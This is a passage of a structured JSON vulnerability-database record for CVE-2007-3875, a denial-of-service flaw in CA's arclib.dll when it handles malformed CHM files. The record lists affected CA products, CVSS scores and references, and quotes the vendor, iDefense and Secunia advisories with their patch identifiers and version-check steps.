"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates anti-spyware for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates arcserve client agent for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust internet security suite r2",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
}
],
"sources": [
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:anti-spyware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:brightstor_arcserve_backup",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:brightstor_arcserve_client",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:brightstor_enterprise_backup",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:brigthstor_arcserve_client_for_windows",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-spyware_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:common_services",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_intrusion_detection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:protection_suites",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_anti-virus_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_ez_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_ez_armor",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_network_and_systems_management",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
],
"trust": 0.6
},
"cve": "CVE-2007-3875",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-3875",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-27237",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-3875",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2007-3875",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-453",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-27237",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "arclib.dll before 7.3.0.9 in CA Anti-Virus (formerly eTrust Antivirus) 8 and certain other CA products allows remote attackers to cause a denial of service (infinite loop and loss of antivirus functionality) via an invalid \"previous listing chunk number\" field in a CHM file. Multiple Computer Associates products are prone to a denial-of-service vulnerability because the applications fail to handle malformed CHM files. \nSuccessfully exploiting this issue will cause the affected applications to stop responding, denying service to legitimate users. \nThis issue affects applications that use the \u0027arclib.dll\u0027 library versions prior to 7.3.0.9. The Arclib.DLL library in eTrust products has a security vulnerability. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: [CAID 35525, 35526]: CA Products Arclib Library Denial of \nService Vulnerabilities\n\nCA Vuln ID (CAID): 35525, 35526\n\nCA Advisory Date: 2007-07-24\n\nReported By:\nCVE-2006-5645 - Titon of BastardLabs and Damian Put \n \u003cpucik at overflow dot pl\u003e working with the iDefense VCP. \nCVE-2007-3875 - An anonymous researcher working with the iDefense \n VCP. \nSergio Alvarez of n.runs AG also reported these issues. \n\nImpact: A remote attacker can cause a denial of service. \n\nSummary: CA products that utilize the Arclib library contain two \ndenial of service vulnerabilities. The second vulnerability, \nCVE-2006-5645, is due to an application hang when processing a \nspecially malformed RAR file. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. \n\nAffected Products:\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.0, \n 7.1, r8, r8.1\nCA Anti-Virus 2007 (v8)\neTrust EZ Antivirus r7, r6.1\nCA Internet Security Suite 2007 (v3)\neTrust Internet Security Suite r1, r2\neTrust EZ Armor r1, r2, r3.x\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus \n Gateway) 7.1\nCA Protection Suites r2, r3\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \n 1.1, 8.0\nCA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) \n r8, 8.1\nCA Anti-Spyware 2007\nUnicenter Network and Systems Management (NSM) r3.0, r3.1, r11, \n r11.1\nBrightStor ARCserve Backup v9.01, r11 for Windows, r11.1, r11.5\nBrightStor Enterprise Backup r10.5\nBrightStor ARCserve Client agent for Windows\neTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1\nCA Common Services (CCS) r11, r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\n\nStatus and Recommendation:\nCA has provided an update to address the vulnerabilities. The \nupdated Arclib library is provided in automatic content updates \nwith most products. Ensure that the latest content update is \ninstalled. In the case where automatic updates are not available, \nuse the following product specific instructions. \n\nCA Secure Content Manager 1.1:\nApply QO89469. \n\nCA Secure Content Manager 8.0:\nApply QO87114. \n\nUnicenter Network and Systems Management (NSM) r3.0:\nApply QO89141. \n\nUnicenter Network and Systems Management (NSM) r3.1:\nApply QO89139. \n\nUnicenter Network and Systems Management (NSM) r11:\nApply QO89140. \n\nUnicenter Network and Systems Management (NSM) r11.1:\nApply QO89138. \n\nCA Common Services (CCS) r11:\nApply QO89140. \n\nCA Common Services (CCS) r11.1:\nApply QO89138. \n\nCA Anti-Virus Gateway 7.1:\nApply QO89381. \n\neTrust Intrusion Detection 2.0 SP1:\nApply QO89474. \n\neTrust Intrusion Detection 3.0:\nApply QO86925. \n\neTrust Intrusion Detection 3.0 SP1:\nApply QO86923. \n\nCA Protection Suites r2:\nApply updates for CA Anti-Virus 7.1. \n\nBrightStor ARCserve Backup and BrightStor ARCserve Client agent \nfor Windows:\n\nManually replace the arclib.dll file with the one provided in the \nCA Anti-Virus 7.1 fix set. \n\n1. Locate and rename the existing arclib.dll file. \n2. Download the CA Anti-Virus 7.1 patch that matches the host \n operating system. \n3. Unpack the patch and place the arclib.dll file in directory \n where the existing arclib.dll file was found in step 1. \n4. Reboot the host. \n\nCA Anti-Virus 7.1 (non Windows):\n\nT229327 \u2013 Solaris \u2013 QO86831\nT229328 \u2013 Netware \u2013 QO86832\nT229329 \u2013 MacPPC \u2013 QO86833\nT229330 \u2013 MacIntel \u2013 QO86834\nT229331 \u2013 Linux390 \u2013 QO86835\nT229332 \u2013 Linux \u2013 QO86836\nT229333 \u2013 HP-UX \u2013 QO86837\n\nCA Anti-Virus 7.1 (Windows):\n\nT229337 \u2013 NT (32 bit) \u2013 QO86843\nT229338 \u2013 NT (AMD64) \u2013 QO86846\n\nCA Threat Manager for the Enterprise r8.1 (non Windows):\n\nT229334 \u2013 Linux \u2013 QO86839 \nT229335 \u2013 Mac \u2013 QO86828\nT229336 \u2013 Solaris \u2013 QO86829\n\nHow to determine if you are affected:\nFor products on Windows:\n1. Using Windows Explorer, locate the file \u201carclib.dll\u201d. By \n default, the file is located in the \n \u201cC:\\Program Files\\CA\\SharedComponents\\ScanEngine\u201d directory(*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated in the table \n below, the installation is vulnerable. \n\nFile Name File Version\narclib.dll 7.3.0.9\n\n*For eTrust Intrusion Detection 2.0 the file is located in \n\u201cProgram Files\\eTrust\\Intrusion Detection\\Common\u201d, and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\u201cProgram Files\\CA\\Intrusion Detection\\Common\u201d. \n\nFor CA Anti-Virus r8.1 on non-Windows:\nUse the compver utility provided on the CD to determine the \nversion of arclib.dll. The same version information above applies. \n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nSecurity Notice for CA Products Containing Arclib\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot\n.asp\nSolution Document Reference APARs:\nQO89469, QO87114, QO89141, QO89139, QO89140, QO89138, QO89140, \nQO89138, QO89381, QO89474, QO86925, QO86923, QO86831, QO86832, \nQO86833, QO86834, QO86835, QO86836, QO86837, QO86843, QO86846, \nQO86839, QO86828, QO86829\nCA Security Advisor posting: \nCA Products Arclib Library Denial of Service Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847\nCA Vuln ID (CAID): 35525, 35526\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526\nReported By:\nCVE-2006-5645 - Titon of BastardLabs and Damian Put \n \u003cpucik at overflow dot pl\u003e working with the iDefense VCP. \nCVE-2007-3875 - An anonymous researcher working with the iDefense \n VCP. \nSergio Alvarez of n.runs AG also reported these issues. \niDefense advisories: \nComputer Associates AntiVirus CHM File Handling DoS Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567\nMultiple Vendor Antivirus RAR File Denial of Service Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439\nCVE References:\nCVE-2006-5645, CVE-2007-3875\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGpp9beSWR3+KUGYURAplHAJ4paEd/cX+2AxdBWfnw2zhfjAGQwACfW+mo\ntCqbonQi4DvtQ9a45c65y70=\n=o8Ac\n-----END PGP SIGNATURE-----\n. BACKGROUND\n\neTrust is an antivirus application developed by Computer Associates. \nMore information can be found on the vendor\u0027s website at the following\nURL. \n\nhttp://www3.ca.com/solutions/product.aspx?ID=156\n\nII. DESCRIPTION\n\nRemote exploitation of a denial of Service (DoS) vulnerability in\nComputer Associates Inc.\u0027s eTrust Antivirus products could allow\nattackers to create a DoS condition on the affected computer. \n\nIII. ANALYSIS\n\nThis denial of service attack will prevent the scanner from scanning\nother files on disk while it is stuck on the exploit file. The hung\nprocess can be quit by the user and does not consume all system\nresources. \n\nIV. DETECTION\n\niDefense has confirmed this vulnerability in eTrust AntiVirus version\nr8. Previous versions of eTrust Antivirus are suspected vulnerable. \nOther Computer Associates products, as well as derived products, may\nalso be vulnerable. \n\nV. WORKAROUND\n\niDefense is not aware of any workarounds for this issue. \n\nVI. VENDOR RESPONSE\n\nComputer Associates has addressed this vulnerability by releasing\nupdates. More information is available within Computer Associates\nadvisory at the following URL. \n\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2007-3875 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n01/16/2007 Initial vendor notification\n01/17/2007 Initial vendor response\n07/24/2007 Coordinated public disclosure\n\nIX. CREDIT\n\nThe discoverer of this vulnerability wishes to remain anonymous. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2007 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. scanning a specially\ncrafted RAR archive. Please see the vendor\u0027s advisory for\ndetails. \n2) The vendor credits Titon of BastardLabs and Damian Put, reported\nvia iDefense Labs. \n\nORIGINAL ADVISORY:\nCA:\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp\n\niDefense Labs:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3875"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-27237",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-3875",
"trust": 3.0
},
{
"db": "BID",
"id": "25049",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "26155",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2007-2639",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1018450",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "58018",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "58024",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-27237",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58032",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
},
{
"db": "BID",
"id": "25049"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "PACKETSTORM",
"id": "58024"
},
{
"db": "PACKETSTORM",
"id": "58018"
},
{
"db": "PACKETSTORM",
"id": "58032"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
},
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"id": "VAR-200707-0263",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-27237"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:03:53.237000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/"
},
{
"title": "CA eTrust Repair measures for multiple product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146845"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002374"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-453"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-3875"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp"
},
{
"trust": 2.2,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567"
},
{
"trust": 1.8,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/25049"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474601/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474605/100/100/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474683/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018450"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/26155"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/2639"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35573"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3875"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3875"
},
{
"trust": 0.3,
"url": "/archive/1/474601"
},
{
"trust": 0.3,
"url": "/archive/1/474568"
},
{
"trust": 0.3,
"url": "/archive/1/474605"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3875"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5645"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5645"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://www3.ca.com/solutions/product.aspx?id=156"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14862/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4088/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86829"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86846"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/314/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86837"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14867/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86831"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86835"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14433/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3099/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3391/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4092/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14804/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8147/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89139"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14868/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86828"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89474\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86843"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14864/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14869/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86832"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89469"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86839"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14436/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8144/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26155/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14866/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14865/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89381\u0026startsearch=1"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo86833"
},
{
"trust": 0.1,
